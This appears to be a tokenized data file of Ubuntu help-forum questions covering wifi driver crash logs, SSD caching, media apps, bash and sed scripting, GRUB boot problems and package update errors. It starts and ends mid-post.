[ size=8k ] capabilities : < access denied > kernel driver in use : iwlwifi kernel modules : wl , iwlwifi thanks in advance for the help @ chili555 here is the last part of the output of dmesg | grep -e wlan -e iwl after the wifi connection got stucked [ 6843.533827 ] iwlwifi 0000:02:00.0 : csr_hw_if_config_reg : 0x00880302 [ 6843.533833 ] iwlwifi 0000:02:00.0 : csr_int_coalescing : 0x0000ff40 [ 6843.533839 ] iwlwifi 0000:02:00.0 : csr_int : 0x80000000 [ 6843.533845 ] iwlwifi 0000:02:00.0 : csr_int_mask : 0x00000000 [ 6843.533852 ] iwlwifi 0000:02:00.0 : csr_fh_int_status : 0x00010000 [ 6843.533858 ] iwlwifi 0000:02:00.0 : csr_gpio_in : 0x00000000 [ 6843.533864 ] iwlwifi 0000:02:00.0 : csr_reset : 0x00000000 [ 6843.533870 ] iwlwifi 0000:02:00.0 : csr_gp_cntrl : 0x080403c5 [ 6843.533876 ] iwlwifi 0000:02:00.0 : csr_hw_rev : 0x000000c8 [ 6843.533882 ] iwlwifi 0000:02:00.0 : csr_eeprom_reg : 0xfccf0ffd [ 6843.533888 ] iwlwifi 0000:02:00.0 : csr_eeprom_gp : 0x90000801 [ 6843.533894 ] iwlwifi 0000:02:00.0 : csr_otp_gp_reg : 0x00030001 [ 6843.533900 ] iwlwifi 0000:02:00.0 : csr_gio_reg : 0x00080044 [ 6843.533906 ] iwlwifi 0000:02:00.0 : csr_gp_ucode_reg : 0x0000a274 [ 6843.533913 ] iwlwifi 0000:02:00.0 : csr_gp_driver_reg : 0x00000080 [ 6843.533918 ] iwlwifi 0000:02:00.0 : csr_ucode_drv_gp1 : 0x00000000 [ 6843.533924 ] iwlwifi 0000:02:00.0 : csr_ucode_drv_gp2 : 0x00000000 [ 6843.533930 ] iwlwifi 0000:02:00.0 : csr_led_reg : 0x00000078 [ 6843.533937 ] iwlwifi 0000:02:00.0 : csr_dram_int_tbl_reg : 0x8822d721 [ 6843.533942 ] iwlwifi 0000:02:00.0 : csr_gio_chicken_bits : 0x29800200 [ 6843.533948 ] iwlwifi 0000:02:00.0 : csr_ana_pll_cfg : 0x00000000 [ 6843.533955 ] iwlwifi 0000:02:00.0 : csr_hw_rev_wa_reg : 0x0001001a [ 6843.533961 ] iwlwifi 0000:02:00.0 : csr_dbg_hpet_mem_reg : 0xffff0000 [ 6843.533964 ] iwlwifi 0000:02:00.0 : fh register values : [ 6843.533980 ] iwlwifi 0000:02:00.0 : fh_rscsr_chnl0_stts_wptr_reg : 0x22cf2a00 [ 6843.533995 ] iwlwifi 0000:02:00.0 : fh_rscsr_chnl0_rbdcb_base_reg : 0x022c4440 [ 6843.534011 ] iwlwifi 0000:02:00.0 : fh_rscsr_chnl0_wptr : 0x000000e8 [ 6843.534026 ] iwlwifi 0000:02:00.0 : fh_mem_rcsr_chnl0_config_reg : 0x80819104 [ 6843.534041 ] iwlwifi 0000:02:00.0 : fh_mem_rssr_shared_ctrl_reg : 0x000000fc [ 6843.534057 ] iwlwifi 0000:02:00.0 : fh_mem_rssr_rx_status_reg : 0x07030000 [ 6843.534072 ] iwlwifi 0000:02:00.0 : fh_mem_rssr_rx_enable_err_irq2drv : 0x00000000 [ 6843.534087 ] iwlwifi 0000:02:00.0 : fh_tssr_tx_status_reg : 0x07ff0001 [ 6843.534103 ] iwlwifi 0000:02:00.0 : fh_tssr_tx_error_reg : 0x00000000 [ 6843.534160 ] iwlwifi 0000:02:00.0 : start iwl event log dump : display last 20 entries [ 6843.534181 ] iwlwifi 0000:02:00.0 : evt_logt:0192856206:0x000000ad:1600 [ 6843.534193 ] iwlwifi 0000:02:00.0 : evt_logt:0192856207:0x00000000:1629 [ 6843.534206 ] iwlwifi 0000:02:00.0 : evt_logt:0192856207:0x00000008:0220 [ 6843.534218 ] iwlwifi 0000:02:00.0 : evt_logt:0192856225:0x00000000:0302 [ 6843.534230 ] iwlwifi 0000:02:00.0 : evt_logt:0192856253:0x00002000:1243 [ 6843.534242 ] iwlwifi 0000:02:00.0 : evt_logt:0192856256:0x000000d4:0303 [ 6843.534255 ] iwlwifi 0000:02:00.0 : evt_logt:0192856260:0x0000187b:0217 [ 6843.534267 ] iwlwifi 0000:02:00.0 : evt_logt:0192856260:0x0b7a001c:0217 [ 6843.534280 ] iwlwifi 0000:02:00.0 : evt_logt:0192856263:0x00040000:1243 [ 6843.534293 ] iwlwifi 0000:02:00.0 : evt_logt:0192856333:0x00000000:0708 [ 6843.534305 ] iwlwifi 0000:02:00.0 : evt_logt:0192856335:0x000000d9:0736 [ 6843.534317 ] iwlwifi 0000:02:00.0 : evt_logt:0192856349:0x00000000:0708 [ 6843.534330 ] iwlwifi 0000:02:00.0 : evt_logt:0192856351:0x000000d9:0736 [ 6843.534342 ] iwlwifi 0000:02:00.0 : evt_logt:0192856358:0x00000000:0708 [ 6843.534354 ] iwlwifi 0000:02:00.0 : evt_logt:0192856360:0x000000d9:0736 [ 6843.534367 ] iwlwifi 0000:02:00.0 : evt_logt:0192856367:0x00000000:0708 [ 6843.534379 ] iwlwifi 0000:02:00.0 : evt_logt:0192856369:0x000000d9:0736 [ 6843.534391 ] iwlwifi 0000:02:00.0 : evt_logt:0192856376:0x00000000:0708 [ 6843.534404 ] iwlwifi 0000:02:00.0 : evt_logt:0192856378:0x000000d9:0736 [ 6843.534416 ] iwlwifi 0000:02:00.0 : evt_logt:0192856395:0x00000000:0125 [ 6843.534767 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 6843.542130 ] iwlwifi 0000:02:00.0 : radio type=0x2-0x0-0x0 [ 6916.660708 ] iwlwifi 0000:02:00.0 : tx aggregation enabled on ra = ee:9f : ef:35:46 : dc tid = 0 [ 6916.711445 ] iwlwifi 0000:02:00.0 : microcode sw error detected . restarting 0x2000000 . [ 6916.711455 ] iwlwifi 0000:02:00.0 : loaded firmware version : 18.168.6.1 [ 6916.711541 ] iwlwifi 0000:02:00.0 : start iwl error log dump : [ 6916.711547 ] iwlwifi 0000:02:00.0 : status : 0x000412e4 , count : 6 [ 6916.711554 ] iwlwifi 0000:02:00.0 : 0x00000edc | advanced_sysassert [ 6916.711559 ] iwlwifi 0000:02:00.0 : 0x00026b94 | upc [ 6916.711564 ] iwlwifi 0000:02:00.0 : 0x00026b1c | branchlink1 [ 6916.711568 ] iwlwifi 0000:02:00.0 : 0x00026b1c | branchlink2 [ 6916.711573 ] iwlwifi 0000:02:00.0 : 0x0000ec7a | interruptlink1 [ 6916.711578 ] iwlwifi 0000:02:00.0 : 0x00000000 | interruptlink2 [ 6916.711583 ] iwlwifi 0000:02:00.0 : 0xf0f45ce8 | data1 [ 6916.711588 ] iwlwifi 0000:02:00.0 : 0xb83c1050 | data2 [ 6916.711592 ] iwlwifi 0000:02:00.0 : 0x00000af4 | line [ 6916.711596 ] iwlwifi 0000:02:00.0 : 0xb2c1568a | beacon time [ 6916.711601 ] iwlwifi 0000:02:00.0 : 0xd3894976 | tsf low [ 6916.711606 ] iwlwifi 0000:02:00.0 : 0x00000001 | tsf hi [ 6916.711610 ] iwlwifi 0000:02:00.0 : 0x00000000 | time gp1 [ 6916.711615 ] iwlwifi 0000:02:00.0 : 0x045dce16 | time gp2 [ 6916.711619 ] iwlwifi 0000:02:00.0 : 0x00000000 | time gp3 [ 6916.711624 ] iwlwifi 0000:02:00.0 : 0x754312a8 | ucode version [ 6916.711628 ] iwlwifi 0000:02:00.0 : 0x000000c8 | hw version [ 6916.711633 ] iwlwifi 0000:02:00.0 : 0x00880302 | board version [ 6916.711637 ] iwlwifi 0000:02:00.0 : 0xb83c1050 | hcmd [ 6916.711642 ] iwlwifi 0000:02:00.0 : csr values : [ 6916.711646 ] iwlwifi 0000:02:00.0 : ( 2nd byte of csr_int_coalescing is csr_int_periodic_reg ) [ 6916.711656 ] iwlwifi 0000:02:00.0 : csr_hw_if_config_reg : 0x00880302 [ 6916.711665 ] iwlwifi 0000:02:00.0 : csr_int_coalescing : 0x00000040 [ 6916.711673 ] iwlwifi 0000:02:00.0 : csr_int : 0x80000000 [ 6916.711681 ] iwlwifi 0000:02:00.0 : csr_int_mask : 0x00000000 [ 6916.711690 ] iwlwifi 0000:02:00.0 : csr_fh_int_status : 0x00010000 [ 6916.711698 ] iwlwifi 0000:02:00.0 : csr_gpio_in : 0x00000000 [ 6916.711707 ] iwlwifi 0000:02:00.0 : csr_reset : 0x00000000 [ 6916.711716 ] iwlwifi 0000:02:00.0 : csr_gp_cntrl : 0x080403c5 [ 6916.711723 ] iwlwifi 0000:02:00.0 : csr_hw_rev : 0x000000c8 [ 6916.711731 ] iwlwifi 0000:02:00.0 : csr_eeprom_reg : 0xfccf0ffd [ 6916.711739 ] iwlwifi 0000:02:00.0 : csr_eeprom_gp : 0x90000801 [ 6916.711748 ] iwlwifi 0000:02:00.0 : csr_otp_gp_reg : 0x00030001 [ 6916.711755 ] iwlwifi 0000:02:00.0 : csr_gio_reg : 0x00080044 [ 6916.711763 ] iwlwifi 0000:02:00.0 : csr_gp_ucode_reg : 0x00004ac4 [ 6916.711771 ] iwlwifi 0000:02:00.0 : csr_gp_driver_reg : 0x00000080 [ 6916.711779 ] iwlwifi 0000:02:00.0 : csr_ucode_drv_gp1 : 0x00000000 [ 6916.711787 ] iwlwifi 0000:02:00.0 : csr_ucode_drv_gp2 : 0x00000000 [ 6916.711794 ] iwlwifi 0000:02:00.0 : csr_led_reg : 0x00000078 [ 6916.711803 ] iwlwifi 0000:02:00.0 : csr_dram_int_tbl_reg : 0x8822d721 [ 6916.711811 ] iwlwifi 0000:02:00.0 : csr_gio_chicken_bits : 0x29800200 [ 6916.711819 ] iwlwifi 0000:02:00.0 : csr_ana_pll_cfg : 0x00000000 [ 6916.711827 ] iwlwifi 0000:02:00.0 : csr_hw_rev_wa_reg : 0x0001001a [ 6916.711836 ] iwlwifi 0000:02:00.0 : csr_dbg_hpet_mem_reg : 0xffff0000 [ 6916.711840 ] iwlwifi 0000:02:00.0 : fh register values : [ 6916.711858 ] iwlwifi 0000:02:00.0 : fh_rscsr_chnl0_stts_wptr_reg : 0x22cf2a00 [ 6916.711877 ] iwlwifi 0000:02:00.0 : fh_rscsr_chnl0_rbdcb_base_reg : 0x022c4440 [ 6916.711895 ] iwlwifi 0000:02:00.0 : fh_rscsr_chnl0_wptr : 0x00000078 [ 6916.711913 ] iwlwifi 0000:02:00.0 : fh_mem_rcsr_chnl0_config_reg : 0x80819104 [ 6916.711931 ] iwlwifi 0000:02:00.0 : fh_mem_rssr_shared_ctrl_reg : 0x000000fc [ 6916.711949 ] iwlwifi 0000:02:00.0 : fh_mem_rssr_rx_status_reg : 0x07030000 [ 6916.711968 ] iwlwifi 0000:02:00.0 : fh_mem_rssr_rx_enable_err_irq2drv : 0x00000000 [ 6916.711987 ] iwlwifi 0000:02:00.0 : fh_tssr_tx_status_reg : 0x07ff0001 [ 6916.712005 ] iwlwifi 0000:02:00.0 : fh_tssr_tx_error_reg : 0x00000000 [ 6916.712066 ] iwlwifi 0000:02:00.0 : start iwl event log dump : display last 20 entries [ 6916.712090 ] iwlwifi 0000:02:00.0 : evt_logt:0073256384:0x00001aa0:0217 [ 6916.712105 ] iwlwifi 0000:02:00.0 : evt_logt:0073256385:0x0b9f001c:0217 [ 6916.712120 ] iwlwifi 0000:02:00.0 : evt_logt:0073256387:0x00040000:1243 [ 6916.712136 ] iwlwifi 0000:02:00.0 : evt_logt:0073256396:0x00000000:0708 [ 6916.712151 ] iwlwifi 0000:02:00.0 : evt_logt:0073256397:0x000000d9:0736 [ 6916.712166 ] iwlwifi 0000:02:00.0 : evt_logt:0073256404:0x00000000:0708 [ 6916.712181 ] iwlwifi 0000:02:00.0 : evt_logt:0073256406:0x000000d9:0736 [ 6916.712195 ] iwlwifi 0000:02:00.0 : evt_logt:0073256413:0x00000000:0708 [ 6916.712210 ] iwlwifi 0000:02:00.0 : evt_logt:0073256415:0x000000d9:0736 [ 6916.712225 ] iwlwifi 0000:02:00.0 : evt_logt:0073256422:0x00000000:0708 [ 6916.712240 ] iwlwifi 0000:02:00.0 : evt_logt:0073256424:0x000000d9:0736 [ 6916.712255 ] iwlwifi 0000:02:00.0 : evt_logt:0073256431:0x00000000:0708 [ 6916.712269 ] iwlwifi 0000:02:00.0 : evt_logt:0073256433:0x000000d9:0736 [ 6916.712284 ] iwlwifi 0000:02:00.0 : evt_logt:0073256440:0x00000000:0708 [ 6916.712298 ] iwlwifi 0000:02:00.0 : evt_logt:0073256442:0x000000d9:0736 [ 6916.712313 ] iwlwifi 0000:02:00.0 : evt_logt:0073256449:0x00000000:0708 [ 6916.712328 ] iwlwifi 0000:02:00.0 : evt_logt:0073256451:0x000000d9:0736 [ 6916.712343 ] iwlwifi 0000:02:00.0 : evt_logt:0073256458:0x00000000:0708 [ 6916.712358 ] iwlwifi 0000:02:00.0 : evt_logt:0073256460:0x000000d9:0736 [ 6916.712373 ] iwlwifi 0000:02:00.0 : evt_logt:0073256477:0x00000000:0125 [ 6916.712880 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 6916.720295 ] iwlwifi 0000:02:00.0 : radio type=0x2-0x0-0x0
290502	what are the advantages/disadvantages of different ssd to hdd cacheing options ( dm-cache , flashcashe ... ) ?	there appear to be various different technologies available to use an ssd to act as a cache for hhds . the ones i know of : dm-cache ( by redhat - in the 3.9 kernel , so it should be in ubuntu 13.10 ) flashcache ( developed and used by facebook ) bcache ( developed and used by google ) enhanceio ( by stec ; based on flashcache ) are there any noteworthy differences in the various implementations ? which one is best for regular desktop pc use - to increase performance of usual programs such as web browsers or games ?
290504	alternative to gwibber with message indicator support	on ubuntu 13.04 it 's impossibile to install gwibber , you get friends-app instead . this one lacks of message indicator support , can you suggest me an alternative to gwibber with this function ?
290507	rhythmbox displaying songs from multiple locations	i chose my ~/music directory as my library location in rhythmbox , but rhythmbox is still displaying songs that are located in other directories . ( all the music in my ~/music folder is in alac , but i keep the original flac files in a separate directory for the day my ipod dies and i can completely go with flac ) how can i prevent this ? i did n't have this problem on 12.04 , but after a clean install of 13.04 i have . thanks ! edit : i noticed `` music '' ( in rhythmbox ) kan be expanded to `` music '' and `` purchased '' . the former contains only the files from my ~/music folder as it should . but the `` global '' music still show all the files from other folders too .
290509	my unity pannel on cairo dock doesnt work	i just upgraded my ubuntu to 13.04 and installed mac theme from noobslab and installed cairo dock . the problem is when i log in i only find cairo gnome and i need cairo unity pannel . please respond , micro
290515	how to install intel cedarview drivers on ubuntu 12.10 or higher ?	i am looking for instructions on how to install cedarview graphics drivers on ubuntu 13.04 32bit . my graphics hardware is a gma3600 aka power vr sgx545 . edit : it seems that they are not in raring yet , but only precise : http : //packages.ubuntu.com/it/precise-updates/cedarview-graphics-drivers edit2 : they seem to be closed source .
290516	ca n't enable rhythmbox 's google music plugin	i tried to install google play music plugin for rhythmbox . i ended up by getting the plugin installed but i ca n't enable it . : c i have : ubuntu 13.04 x32 gnome 3.8 thanks in advance
290517	does darktable manage the files of a collection ?	i am currently trying out darktable . coming from digikam i am confused about several things , the most prominent for me being : does darktable manage my files on disk ? in digikam , i define a collection folder where all my files will be stored and then when i import images from a camera , folder , sdcard , $ whatever it will copy them over to my collection and apply different operation like exif renaming in the process . afterwards i can be sure to find all my files in the collection folder in the format i wanted . so , does darktable do that , too ? to me it has more of a look that it just manages files i import without everr eally touching them . if so , what are my options for organizing the disk/folder/file part of my collection ? relying only on darktables collection mechanisms for organizing my collection seems like a `` vendor lock in '' to me in that it makes migrating to a different product later on way harder than if all metadata is stored in the actual image files and the files are neatly sorted in folder and such .
290520	nautilus crashing because of dropbox ( ubuntu 13.04 )	i have a strange problem that causes nautilus to crash : when dropbox is active and i click ( even just once ) on the dropbox folder in my home folder nautilus crashes . when i turn it on again it shows me hidden files and still crushes if i try to open the dropbox folder again . everything works just fine when the dropbox client is not running . when running nautilus from the shell and trying to access the dropbox folder , i get the following error : $ nautilus initializing nautilus-dropbox 1.6.0 nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . ( nautilus:3835 ) : gtk-warning ** : refusing to add non-unique action 'nautilusdropbox : :browse ' to action group 'dirextensionsmenugroup' segmentation fault ( core dumped ) what may cause this and how should i deal with this ? thank you in advance !
290524	use axel in apt-fast instead of aria2	i have installed apt-fast , but i only get aria2 downloader and nothing else . i like to use axel , and have installed it too , but i can not use it for apt-fast . i also tried : $ sudo dpkg-reconfigure apt-fast but get only aria2 as option , ( and also custom option ) i want to use axel , how to do so ?
290531	windows 7 not booting after installation of ubuntu 12.04	i have installed ubuntu 12.04 along side windows 7 ultimate . but the problem is as soon as i switch on my computer . there is only a blank screen with my tft screen displaying a message `` out of range '' . then suddenly ubuntu loads without showing any option to load windows 7 .
290545	how to write a script as a string and save it in variable ten echo it to any file during run time and execute it in a terminal	here u are the code i want to do , the problem is the special characters i punt like / and then and those things while executing , it dont consider the text between those two parentheses ( ) a string to save it in a variable and that is all so how can i fox this i put the whole code to give u a clear idea about the problem thanks in advance # ! /bin/bash trap `` echo 'caught ' > /home/ahmedubuntu/desktop/fsg.txt '' sigint sigterm sighup script= ( # ! /bin/bash echo `` fdsfds '' while sleep 4 do i=0 while read line do if [ -n `` $ line '' ] & & [ `` $ line '' ! = `` separator '' ] then programenameandpid [ i ] = $ line ( ( i++ ) ) elif [ [ `` $ line '' == `` separator '' ] ] ; then getallpidrununderthisprogram= $ ( ps -e | grep `` $ programenameandpid [ 0 ] '' | awk ' { print $ 1 ; } ' ) if [ $ { # getallpidrununderthisprogram [ * ] } -gt $ { # programenameandpid [ * ] } -2 ] then unset gnometab newprocessnumber= $ { # getallpidrununderthisprogram [ * ] } - $ { # programenameandpid [ * ] } -2 index= $ { # getallpidrununderthisprogram [ * ] } -1 for ( ( c= $ newprocessnumber ; c > 0 ; c -- ) ) do gnometab+= ( -- tab -e `` cpulimit -p $ getallpidrununderthisprogram [ $ index ] -l $ programenameandpid [ 1 ] `` ) ( ( index -- ) ) done gnome-terminal `` $ { gnometab [ @ ] } '' fi i=0 unset programenameandpid fi done < $ datafile done ) echo -e $ script > /home/ahmedubuntu/desktop/script.txt gnome-terminal -e `` /home/ahmedubuntu/desktop/script.txt '' also i tried this part of code to store the text in file directly and i found taht the stored is the run resut of the code not just considered a string and just write it in file as i want cat > /home/ahmedubuntu/desktop/script.sh < < eof # ! /bin/bash echo `` fdsfds '' while sleep 4 do i=0 while read line do if [ -n `` $ line '' ] & & [ `` $ line '' ! = `` separator '' ] then programenameandpid [ i ] = $ line ( ( i++ ) ) elif [ [ `` $ line '' == `` separator '' ] ] ; then getallpidrununderthisprogram= $ ( ps -e | grep `` $ programenameandpid [ 0 ] '' | awk ' { print $ 1 ; } ' ) if [ $ { # getallpidrununderthisprogram [ * ] } -gt $ { # programenameandpid [ * ] } -2 ] then unset gnometab newprocessnumber= $ { # getallpidrununderthisprogram [ * ] } - $ { # programenameandpid [ * ] } -2 index= $ { # getallpidrununderthisprogram [ * ] } -1 for ( ( c= $ newprocessnumber ; c > 0 ; c -- ) ) do gnometab+= ( -- tab -e `` cpulimit -p $ getallpidrununderthisprogram [ $ index ] -l $ programenameandpid [ 1 ] `` ) ( ( index -- ) ) done gnome-terminal `` $ { gnometab [ @ ] } '' fi i=0 unset programenameandpid fi done < $ datafile done eof
290546	how to run .run files in ubuntu	i download a software from http : //qt-project.org/downloads and it is .run file and when i want to open that , it says : '' there is no application installed for 'executable ' files . do you want to search for an application to open this file ? '' and i click on yes but it did n't find anything . what i have to do ? ! ( sorry because of my bad english : d )
290550	wine does n't show persian ( or arabic ) words	i installed winehq but when i open a program which has persian ( or arabic ) words it does n't shows the words and shows square instead of words ! what i have to do ?
290552	how to stop sharing a link in windows sync panel ?	i 'm using the windows client for ubuntu one . there 's a panel called `` share links '' . the windows client does n't appear to have a button to stop sharing a file . the website has a button to `` stop publishing '' .
290553	nagios notification via ubuntu notify-osd	i have been looking around for a nagios plugin that offers the ability to have alerts for my hosts and services that i monitor to come through to my ubuntu pc in the form of an onscreen notification . i have some experience working with nagios and custom checks and notification methods , i dont how ever have any experience working with the ubuntu notify-osd package . any help or suggestions would be great
290555	tell sed to make changes but those starting with a specific string in 8th to last line	here again with another problem with sed . as the title says , i want sed to change lines starting at the 8th line to the end , but only lines which start with < b > . i have code all ready and just wanted to append the argument to change lines starting with < b > . example of code sed -e '8 , $ { s/\./\0 < \/b > / } ' > `` $ file '' _new example input : < b > < font color= '' # 000000 '' > < p align= '' justify '' > coat . how are you . < b > < font color= '' # 000000 '' > < p align= '' justify '' > money.where are you . < b > < font color= '' # 000000 '' > < p align= '' justify '' > food.what are you . < font color= '' # 000000 '' > < p align= '' justify '' > food.what are you . < b > < font color= '' # 000000 '' > < p align= '' justify '' > car.which are you . < font color= '' # 000000 '' > < p align= '' justify '' > car.which are you . < b > < font color= '' # 000000 '' > < p align= '' justify '' > quality.when are you . example output : < b > < font color= '' # 000000 '' > < p align= '' justify '' > coat. < /b > how are you . < b > < font color= '' # 000000 '' > < p align= '' justify '' > money. < /b > where are you . < font color= '' # 000000 '' > < p align= '' justify '' > food.what are you . < b > < font color= '' # 000000 '' > < p align= '' justify '' > food. < /b > what are you . < b > < font color= '' # 000000 '' > < p align= '' justify '' > car. < /b > which are you . < font color= '' # 000000 '' > < p align= '' justify '' > car.which are you . < b > < font color= '' # 000000 '' > < p align= '' justify '' > quality. < /b > when are you . these lines are situated from 8th line to end . i do n't want any kind of change in 1-7th line .
290556	how do i display database statistics in darktable ?	is there a way of showing stats abut the whole darktable system ? i would be interested in things like ... number of images by camera by file type current queue stats how many ( if any ) images still need to be indexed how much space is taken up by thumbnails image fingerprints metadata ... live stats : cpu usage gpu usage ( seems to me more important for this application anyway )
290557	grub rescure mode , `` error : unknow filessystem '' and difficulty booting from usb	i was trying to install ubuntu in a dual boot with win8 , but i 've installed several other distros in the past so i was quite confused by all the different partitions . i thought i 'd solve this by booting into windows deleting all the linux partitions and reinstalling , i assumed i 'd be able to boot from usb just fine . however , now when i start the laptop , a toshiba satellite , it just goes straight into grub rescue mode . it no longer shows the `` press f12 '' to change the boot device order and pressing f12 has no effect . in grub rescue mode `` ls '' command works and shows : ( hd0 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) ( hd1 ) ( hd1 , msdos1 ) ( i assume hd0 is my local hd and hd1 is my bootable ubuntu usb key ) however all other command seem to end in `` error : unknown filesystem '' i 've tried `` ls ( hd1 , msdos1 ) / '' , this gives `` error : unknown filesystem '' , as does `` insmod normal '' . i think my usb key uses a fat32 file system , maybe this is why all other grub commands give `` error : unknown filesystem '' ? if so how can i prepare a bootable usb stick with a linux partition ?
290562	how to update cryptsetup till version 1.6.1 ?	hello current version of cryptsetup is not capable working with truecrypt partitions . versions after 1.5.x are capable . ( http : //code.google.com/p/cryptsetup/wiki/cryptsetup160 ) so here is the latest version of cryptsetup : http : //cryptsetup.googlecode.com/files/cryptsetup-1.6.1.tar.bz2 is it possible to install on ubuntu and how ? thanks in advance .
290564	a4tech mouse not working	i connected a new mouse via usb to my netbook with ubuntu and it does not work ( but the mouse laser is on ) . here 's what dmesg says : [ 39.747822 ] usb 3-1 : new low-speed usb device number 2 using xhci-hcd [ 39.768627 ] usb 3-1 : new usb device found , idvendor=09da , idproduct=000a [ 39.768698 ] usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 39.768761 ] usb 3-1 : product : usb mouse [ 39.768805 ] usb 3-1 : manufacturer : a4tech [ 39.778492 ] usb 3-1 : ep 0x81 - rounding interval to 64 microframes , ep desc says 80 microframes what should i do to make it working ?
290567	slow and freezy 13.04 system under nvidia graphics	i have the same problem under 13.04 , i have nvidia c73 ( geforce7100/nforce 630i ) and it freezes randomly when i use unity icons , the system is pretty slow anyway . i tried the opensource x-org driver , with the closed one it 's much slower but not freezing . the kernel version is 3.8.0-19 . do you have any idea ? thanks for your attention !
290569	not able to update ubuntu 12.04	i have ubuntu 12.04 . but every time , i want to update , it does not work . it says , i am not connected to the internet . but this is wrong , i am connected . this is the text : failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/universe/c/chromium-browser/chromium-browser-l10n_24.0.1312.56-0ubuntu0.12.04.1_all.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/universe/c/chromium-browser/chromium-codecs-ffmpeg_24.0.1312.56-0ubuntu0.12.04.1_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/universe/c/chromium-browser/chromium-browser_24.0.1312.56-0ubuntu0.12.04.1_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/l/lightdm/lightdm_1.2.3-0ubuntu1_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/g/gnome-control-center/gnome-control-center-data_3.4.2-0ubuntu0.9_all.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/l/lightdm/liblightdm-gobject-1-0_1.2.3-0ubuntu1_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/u/unity-greeter/unity-greeter_0.2.9-0ubuntu1_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-globalmenu_18.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_18.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : archive.canonical.com/ubuntu/pool/partner/a/adobe-flashplugin/adobe-flash-properties-gtk_11.2.202.262-0precise1_amd64.deb 404 not found [ ip : 91.189.92.191 80 ] failed to fetch http : archive.canonical.com/ubuntu/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.262-0precise1_amd64.deb 404 not found [ ip : 91.189.92.191 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/g/gnome-control-center/libgnome-control-center1_3.4.2-0ubuntu0.9_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/d/deja-dup/deja-dup_22.0-0ubuntu3_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-branding_18.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_18.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-locale-de_18.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/g/gnome-control-center/gnome-control-center_3.4.2-0ubuntu0.9_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-common_1.11.4-0ubuntu10.11_all.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-core_1.11.4-0ubuntu10.11_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-generic_3.2.0.37.45_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-generic_3.2.0.37.45_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] failed to fetch http : de.archive.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-generic_3.2.0.37.45_amd64.deb 404 not found [ ip : 141.30.13.10 80 ] after each `` http : '' there is `` // '' , but i am not allowed to post more than 2 links , so i left it away , because now it is not declared as a link . i hope , you can still know , what i mean . i have also an image , but i am not allowed to post it either . so i copied the text . the headline is `` das herunterladen der paketdateien ist gescheitert . bitte überprüfen sie ihre internetverbindung . '' means : the downloading of the packet data was not successful . please check your connection to the internet . '' ( i hope , it´s correctly translated , i am not very good at english ) i hope , you can help me ! i am really desperate . thank you in advance ! kathrin
290571	ubuntu server 12.10 - > 13.04 upgrade & mdadm raid arrary	now that 13.04 is out - i am looking to upgrade my home server ( test rig ) to have a play . just wondering what effect running do-release-upgrade would have on my mdadm raid array ? would it survive the upgrade ? for info the system is set up like this : /dev/sda - os disk 500gb /dev/sbb-e - 4x 2tb discs in raid 5 configuration ( mdadm )
290572	ca n't boot to ubuntu 13.04 after installing	i know that there is lots of people with the exact same problem , but i ca n't get an answer from another place ( i 've really been trying for hours ) , so here is my problem . i got ubuntu 13.04 on my cd and i installed it beside windows . something went wrong and it said '' executing 'grub-install /dev/sda ' failed . this is a fatal error '' i could choose where to install the bootloader and i selected /sda . but after rebooting , i went to windows , which i did n't wanted to . i tried the boot-repair ( recommended ) and it said : boot successfully repaired . you can now reboot your computer . please do not forget to make your bios boot on sdb ( 500gb ) disk ! i rebooted and i got ubuntu , just like i wanted . but then after an hour of using , i pressed at 'shut down ' . like 2 hours after , i came again but saw the windows logo another time . i tried to use the boot-repair and it said the exact same thing , but when i rebooted i just went to 